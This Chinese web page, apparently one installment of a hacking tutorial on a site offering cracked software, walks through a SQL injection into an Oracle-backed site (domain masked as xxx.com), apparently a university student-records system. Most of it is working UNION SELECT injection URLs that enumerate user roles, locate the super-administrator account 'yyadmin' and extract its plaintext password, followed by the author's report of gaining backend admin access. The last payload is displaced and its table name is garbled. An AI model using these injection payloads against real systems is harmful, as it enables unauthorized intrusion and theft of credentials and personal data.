免费教程_免费网赚教程_破解版软件-寂涯网络学习基地

当前位置: 主页 > 网站相关 > 网站安全 > 注入oracle数据库过程(3)

注入oracle数据库过程(3)

时间:2011-11-02 22:28来源:未知 整理:寂涯网络 点击:


http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+
and+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001'

3
经过多次尝试,提交:
 
 
 
 
 
 
 
 
 
 
 
 
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+an
d+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,ROLE_ID,NULL,NULL,NULL,NULL,NULL from
VW_GY_USER_REL_RULE where ROLE_ID<>'ff80808102e6b16e0102fd3761c200cf' and
ROLE_ID<>'402880711d2d9284011d2d987ee90001' and
ROLE_ID<>'402880d21997cadf011997cdd8cb0003' and
ROLE_ID<>'402880d2191321a60119135323d1001b' and
ROLE_ID<>'402880d2191321a60119134afc990012' and
ROLE_ID<>'402880befe8e9e8400fe8e9e84c30000' and
ROLE_ID<>'402880befe8e9e8400fe8ea9600f0004' and
ROLE_ID<>'402880d2191321a6011913549b8d001f' and
ROLE_ID<>'402880d2191321a60119134c01a50016'

我终于找到了“研究生学籍超级管理员” ,用户名是yyadmin。

赶快查询他的密码吧,提交:
 
 
 
 
 
管理员的密码是明文保存的,于是顺利地得到了后台管理员权限,但后来发现管理员使
用的功能十分有限,虽然最终并未得到jspshell,不过这也是一次非常曲折离奇的注入经
历了。                                                                       
-------------------------------------------------------------------------------
前置知识:无
关键词;Public,asp.net,渗透
http://www.xxx.com/messageviewlisting.do?method=query&criteria=2%3D1+a
nd+title+like+%27%252010%25%27 union all select
NULL,USERNAME,NULL,ROLENAME,USERPW,NULL,NULL,NULL,NULL,NULL from
VW GY USERRELRULEwhereUSERNAME='yyadmin'
 

本页地址 http://www.jybase.net/wangzhananquan/20111102546.html

百度搜索更多

谷歌搜索更多

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------

评价:
昵称: 验证码:点击我更换图片
推荐内容
赞助商
赞助商


关于本站免责声明视频更新google百度地图视频地图RRS订阅

如有什么问题请在本站留言,或发邮件到 hxt167#foxmail.com